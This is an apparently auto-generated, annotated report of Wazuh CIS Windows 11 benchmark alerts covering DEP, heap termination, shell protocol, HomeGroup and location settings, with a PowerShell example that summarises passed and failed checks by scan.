🕒 2025-04-24T22:50:09.975+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.975+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.31.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.5']
CIS Critical Security Controls mapping (v8 numbering – 10.5 = enable anti‑exploitation features such as DEP).

rule.gpg13:  ['4.12']
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV reference – Art. 35(7)(d), the security measures a DPIA must document. Same article as rule.gdpr, just split by chapter.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2583879
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type: 'check' = the result of one benchmark check (this alert); 'summary' = the end‑of‑scan pass/fail totals. It is not the scan engine.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26311
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off Data Execution Prevention for Explorer' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  Disabling Data Execution Prevention can allow certain legacy plug-in applications to function without terminating Explorer. The recommended state for this setting is: Disabled. Note: Some legacy plug-in applications and other software may not function with Data Execution Prevention and will require an exception to be defined for that specific plug-in/software.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Data Execution Prevention is an important security feature supported by Explorer that helps to limit the impact of certain types of malware.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off Data Execution Prevention for Explorer. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Explorer.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.31.2
Exact CIS benchmark recommendation number for this one check. The per‑check compliance.* fields are narrower than the rule.* lists above, which are the union across every check the rule fires for.

data.sca.check.compliance.cis_csc:  10.5
CIS Critical Security Controls mapping (v8 numbering – 10.5 = enable anti‑exploitation features such as DEP).

data.sca.check.compliance.pci_dss:  10.6.1
PCI DSS requirement mapping (10.6.1 = daily review of security events and logs).

data.sca.check.compliance.nist_800_53:  AU.6
NIST SP 800‑53 control (AU‑6 = audit record review, analysis and reporting).

data.sca.check.compliance.gpg13:  4.12
UK NCSC Good Practice Guide 13 (protective monitoring) control reference.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV reference – Art. 35(7)(d), security measures a DPIA must document. Same mapping as rule.gdpr.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule § 164.312(b) – audit controls.

data.sca.check.compliance.tsc:  CC6.1,CC6.8,CC7.2,CC7.3
SOC 2 Trust Services Criteria for this single check (the rule‑level tsc list merges several checks, which is why it repeats CC7.2).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer']
Registry key the check read. The 'Turn off Data Execution Prevention for Explorer' policy stores its value under this key; Disabled keeps DEP active for explorer.exe, and an attacker who flips this value here gets the same effect as the policy change.

data.sca.check.result:  passed
passed or failed against the benchmark. failed = configuration drift that needs a hardening ticket; it is a compliance finding, not evidence of intrusion.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.990+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.990+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.31.3']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2587688
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type: 'check' = the result of one benchmark check (this alert); 'summary' = the end‑of‑scan pass/fail totals. It is not the scan engine.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26312
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off heap termination on corruption' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  Without heap termination on corruption, legacy plug-in applications may continue to function when a File Explorer session has become corrupt. Ensuring that heap termination on corruption is active will prevent this. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Allowing an application to function after its session has become corrupt increases the risk posture to the system.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off heap termination on corruption. Note: This Group Policy path is provided by the Group Policy template Explorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.31.3
CIS benchmark recommendation number this check implements; cite it in the hardening ticket.

data.sca.check.compliance.pci_dss:  2.2.4
PCI DSS requirement the check maps to (v3.2.1 numbering; 2.2.4 = configure system security parameters to prevent misuse).

data.sca.check.compliance.nist_800_53:  CM.1
NIST SP 800‑53 control mapping; CM‑1 is the configuration management policy and procedures control.

data.sca.check.compliance.tsc:  CC5.2
SOC 2 Trust Services Criteria mapping; CC5.x = control activities, CC6.x = logical and physical access, CC7.x = system operations.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer']
Registry key(s) the check reads to decide pass/fail. The value name and expected data are not in the alert; a value that is absent (policy Not Configured) does not satisfy the check even where the Windows default already behaves that way.

data.sca.check.result:  passed
passed, failed or not applicable. Only failed means the host drifts from the benchmark; passed checks are alerted too, so filter on this field before triaging.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list. For SCA alerts the label ignores check.result, so a passed check gets the same Medium as a failed one; triage on check.result and rule.level instead.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
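Every SCA alert in this report arrives labelled Medium whether the check passed or failed, and one scan produces dozens of them. The PowerShell below is an added example, not SOCscribe or Wazuh code: it reads Wazuh alerts.json lines, collapses them into one summary per agent and scan_id, and lists only the failed checks with their CIS number and registry key. The four alert lines are constructed from the fields shown in this report and trimmed to the fields the functions use; the alerts.json path in the comment is the Wazuh manager default and is an assumption about your deployment.

```powershell
# Added example (not SOCscribe or Wazuh code): triage Wazuh SCA alerts by
# check result instead of by the report's Medium label.
# The sample alerts below are constructed from this report, trimmed to the fields used.
$sampleAlerts = @'
{"timestamp":"2025-04-24T22:50:10.006+0000","rule":{"level":3,"id":"19008","groups":["sca"]},"agent":{"id":"001","name":"Attacker"},"data":{"sca":{"type":"check","scan_id":1948494698,"policy":"CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0","check":{"id":26313,"title":"Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.","compliance":{"cis":"18.9.31.4"},"registry":["HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"],"result":"passed"}}},"_severity_label":"Medium"}
{"timestamp":"2025-04-24T22:50:10.022+0000","rule":{"level":7,"id":"19007","groups":["sca"]},"agent":{"id":"001","name":"Attacker"},"data":{"sca":{"type":"check","scan_id":1948494698,"policy":"CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0","check":{"id":26314,"title":"Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.","compliance":{"cis":"18.9.36.1"},"registry":["HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup"],"result":"failed"}}},"_severity_label":"Medium"}
{"timestamp":"2025-04-24T22:50:10.069+0000","rule":{"level":7,"id":"19007","groups":["sca"]},"agent":{"id":"001","name":"Attacker"},"data":{"sca":{"type":"check","scan_id":1948494698,"policy":"CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0","check":{"id":26317,"title":"Ensure 'Block all consumer Microsoft account user authentication' is set to 'Enabled'.","compliance":{"cis":"18.9.46.1"},"registry":["HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\MicrosoftAccount"],"result":"failed"}}},"_severity_label":"Medium"}
{"timestamp":"2025-04-24T22:50:10.084+0000","rule":{"level":3,"id":"19008","groups":["sca"]},"agent":{"id":"001","name":"Attacker"},"data":{"sca":{"type":"check","scan_id":1948494698,"policy":"CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0","check":{"id":26318,"title":"Ensure 'Configure local setting override for reporting to Microsoft MAPS' is set to 'Disabled'.","compliance":{"cis":"18.9.47.4.1"},"registry":["HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet"],"result":"passed"}}},"_severity_label":"Medium"}
'@

function Read-WazuhAlerts {
    # One JSON document per line, as in alerts.json; blank lines are skipped.
    param([Parameter(Mandatory)][string[]]$Lines)
    foreach ($line in $Lines) {
        if ($line.Trim()) { $line | ConvertFrom-Json }
    }
}

function Get-ScaScanSummary {
    # One row per agent/scan_id: how many checks passed, how many failed, which CIS ids failed.
    param([Parameter(Mandatory)][object[]]$Alerts)
    $checks = $Alerts | Where-Object { $_.rule.groups -contains 'sca' -and $_.data.sca.type -eq 'check' }
    $checks | Group-Object { '{0}/{1}' -f $_.agent.name, $_.data.sca.scan_id } | ForEach-Object {
        $first  = $_.Group[0]
        $failed = @($_.Group | Where-Object { $_.data.sca.check.result -eq 'failed' })
        $passed = @($_.Group | Where-Object { $_.data.sca.check.result -eq 'passed' })
        [pscustomobject]@{
            Agent       = $first.agent.name
            ScanId      = $first.data.sca.scan_id
            Policy      = $first.data.sca.policy
            Passed      = $passed.Count
            Failed      = $failed.Count
            # passed checks that still carry a non-Low label are scoring noise, not risk
            NoisyPassed = @($passed | Where-Object { $_._severity_label -ne 'Low' }).Count
            FailedCis   = ($failed | ForEach-Object { $_.data.sca.check.compliance.cis }) -join ', '
        }
    }
}

function Get-ScaFailedChecks {
    # The only rows worth a ticket: failed checks with the key the scanner looked at.
    param([Parameter(Mandatory)][object[]]$Alerts)
    $Alerts | Where-Object { $_.data.sca.check.result -eq 'failed' } | ForEach-Object {
        [pscustomobject]@{
            Agent    = $_.agent.name
            Cis      = $_.data.sca.check.compliance.cis
            Level    = $_.rule.level
            Title    = $_.data.sca.check.title
            Registry = ($_.data.sca.check.registry -join '; ')
        }
    }
}

$alerts = Read-WazuhAlerts -Lines ($sampleAlerts -split "`r?`n")
# Live data (assumed default manager path): Read-WazuhAlerts -Lines (Get-Content /var/ossec/logs/alerts/alerts.json)
Get-ScaScanSummary  -Alerts $alerts | Format-List
Get-ScaFailedChecks -Alerts $alerts | Format-Table -AutoSize -Wrap
```

On the constructed sample the summary reports 2 passed, 2 failed and 2 noisy passed rows for Attacker/1948494698, and the failed-check table lists 18.9.36.1 and 18.9.46.1. Keying on data.sca.scan_id is what lets you treat a whole scan as one event instead of one alert per check.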

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.006+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.006+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired. In this report 19007 (level 7) accompanies failed SCA checks and 19008 (level 3) passed ones.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.31.4']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2590885
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: 'check' is the result of one benchmark check, 'summary' is the per‑scan pass/fail totals. It does not say which engine (registry, command, file) evaluated the check.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26313
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off shell protocol protected mode' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure the amount of functionality that the shell protocol can have. When using the full functionality of this protocol, applications can open folders and launch files. The protected mode reduces the functionality of this protocol allowing applications to only open a limited set of folders. Applications are not able to open files with this protocol when it is in the protected mode. It is recommended to leave this protocol in the protected mode to increase the security of Windows. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Limiting the opening of files and folders to a limited set reduces the attack surface of the system.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\File Explorer\Turn off shell protocol protected mode. Note: This Group Policy path is provided by the Group Policy template WindowsExplorer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.31.4
CIS benchmark recommendation number this check implements; cite it in the hardening ticket.

data.sca.check.compliance.pci_dss:  2.2.4
PCI DSS requirement the check maps to (v3.2.1 numbering; 2.2.4 = configure system security parameters to prevent misuse).

data.sca.check.compliance.nist_800_53:  CM.1
NIST SP 800‑53 control mapping; CM‑1 is the configuration management policy and procedures control.

data.sca.check.compliance.tsc:  CC5.2
SOC 2 Trust Services Criteria mapping; CC5.x = control activities, CC6.x = logical and physical access, CC7.x = system operations.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer']
Registry key(s) the check reads to decide pass/fail. The value name and expected data are not in the alert; a value that is absent (policy Not Configured) does not satisfy the check even where the Windows default already behaves that way.

data.sca.check.result:  passed
passed, failed or not applicable. Only failed means the host drifts from the benchmark; passed checks are alerted too, so filter on this field before triaging.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list. For SCA alerts the label ignores check.result, so a passed check gets the same Medium as a failed one; triage on check.result and rule.level instead.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.022+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.022+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. In this report 19007 (level 7) accompanies failed SCA checks and 19008 (level 3) passed ones.

rule.firedtimes:  26
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '7.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.4']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.36.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2594755
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: 'check' is the result of one benchmark check, 'summary' is the per‑scan pass/fail totals. It does not say which engine (registry, command, file) evaluated the check.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26314
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Prevent the computer from joining a homegroup' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  By default, users can add their computer to a HomeGroup on a home network. The recommended state for this setting is: Enabled. Note: The HomeGroup feature is available in all workstation releases of Windows from Windows 7 through Windows 10 Release 1709. Microsoft removed the feature completely starting with Windows 10 Release 1803. However, if your environment still contains any Windows 10 Release 1709 (or older) workstations, then this setting remains important to disable HomeGroup on those systems.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  While resources on a domain-joined computer cannot be shared with a HomeGroup, information from the domain-joined computer can be leaked to other computers in the HomeGroup.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\HomeGroup\Prevent the computer from joining a homegroup. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sharing.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.36.1
CIS benchmark recommendation number this check implements; cite it in the hardening ticket.

data.sca.check.compliance.pci_dss:  7.1
PCI DSS requirement the check maps to (v3.2.1 numbering; 7.1 = limit access to system components to those whose job requires it).

data.sca.check.compliance.tsc:  CC6.4
SOC 2 Trust Services Criteria mapping; CC5.x = control activities, CC6.x = logical and physical access, CC7.x = system operations.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\HomeGroup']
Registry key(s) the check reads to decide pass/fail. The value name and expected data are not in the alert; a value that is absent (policy Not Configured) does not satisfy the check even where the Windows default already behaves that way.

data.sca.check.result:  failed
passed, failed or not applicable. Only failed means the host drifts from the benchmark; passed checks are alerted too, so filter on this field before triaging.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list. For SCA alerts the label ignores check.result, so a passed check gets the same Medium as a failed one; triage on check.result and rule.level instead.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.038+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.038+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off location' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired. In this report 19007 (level 7) accompanies failed SCA checks and 19008 (level 3) passed ones.

rule.firedtimes:  27
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.41.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2598554
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Event type from the SCA module: 'check' is the result of one benchmark check, 'summary' is the per‑scan pass/fail totals. It does not say which engine (registry, command, file) evaluated the check.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26315
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn off location' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting turns off the location feature for the computer. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  This setting affects the location feature (e.g. GPS or other location tracking). From a security perspective, it's not a good idea to reveal your location to software in most cases, but there are legitimate uses, such as mapping software. However, they should not be used in high security environments.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Location and Sensors\Turn off location. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Sensors.admx/adml that is included with the Microsoft Windows 7 & Server 2008 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.41.1
CIS benchmark recommendation number this check implements; cite it in the hardening ticket.

data.sca.check.compliance.pci_dss:  2.2.5
PCI DSS requirement the check maps to (v3.2.1 numbering; 2.2.5 = remove unnecessary functionality).

data.sca.check.compliance.tsc:  CC6.3
SOC 2 Trust Services Criteria mapping; CC5.x = control activities, CC6.x = logical and physical access, CC7.x = system operations.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\LocationAndSensors']
Registry key(s) the check reads to decide pass/fail. The value name and expected data are not in the alert; a value that is absent (policy Not Configured) does not satisfy the check even where the Windows default already behaves that way.

data.sca.check.result:  failed
passed, failed or not applicable. Only failed means the host drifts from the benchmark; passed checks are alerted too, so filter on this field before triaging.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list. For SCA alerts the label ignores check.result, so a passed check gets the same Medium as a failed one; triage on check.result and rule.level instead.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

